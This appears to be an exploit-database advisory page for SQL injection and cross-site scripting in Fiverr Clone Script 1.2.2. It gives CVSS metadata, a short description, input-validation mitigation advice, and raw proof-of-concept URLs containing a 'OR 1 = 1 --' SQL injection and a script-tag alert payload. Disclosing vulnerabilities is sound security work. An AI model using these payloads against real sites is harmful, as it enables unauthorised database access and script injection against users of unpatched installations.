header-logo
Suggest Exploit
vendor:
Fiverr Clone Script
by:
Mr Winst0n
8.8
CVSS
HIGH
SQL Injection / Cross Site Scripting
89, 79
CWE
Product Name: Fiverr Clone Script
Affected Version From: 1.2.2
Affected Version To: 1.2.2
Patch Exists: NO
Related CWE: N/A
CPE: a:phpscriptsmall:fiverr_clone_script
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux, Windows 8.1
2019

Fiverr Clone Script 1.2.2 – SQL Injection / Cross Site Scripting

A vulnerability exists in Fiverr Clone Script 1.2.2 which allows an attacker to inject malicious SQL commands or execute Cross Site Scripting attacks. This can be exploited by sending a specially crafted HTTP request to the vulnerable application. Successful exploitation could result in unauthorized access to sensitive data or the execution of arbitrary code.

Mitigation:

Input validation should be used to prevent malicious SQL commands from being executed. Additionally, Cross Site Scripting attacks should be prevented by validating user input and encoding output.
Source

Exploit-DB raw data:

# Exploit Title: Fiverr Clone Script 1.2.2 - SQL Injection / Cross Site Scripting
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: Apr 1, 2019
# Vendor Homepage: https://www.phpscriptsmall.com
# Software Link : https://www.phpscriptsmall.com/product/fiverr-clone-script/
# Tested Version: 1.2.2
# Tested on: Kali linux, Windows 8.1 


# PoC:

# http://localhost/?page=[SQLi]
# http://localhost/search-results.php?category=[Category id]&subcategory=[Subcategory id]&keyword=[XSS]

# http://localhost/?page=2%20%27%20OR%201%20=%201%20--
# http://localhost/search-results.php?category=32&subcategory=63&keyword=<ScrIpt>alert(1)</sCrIpT>&project_search=#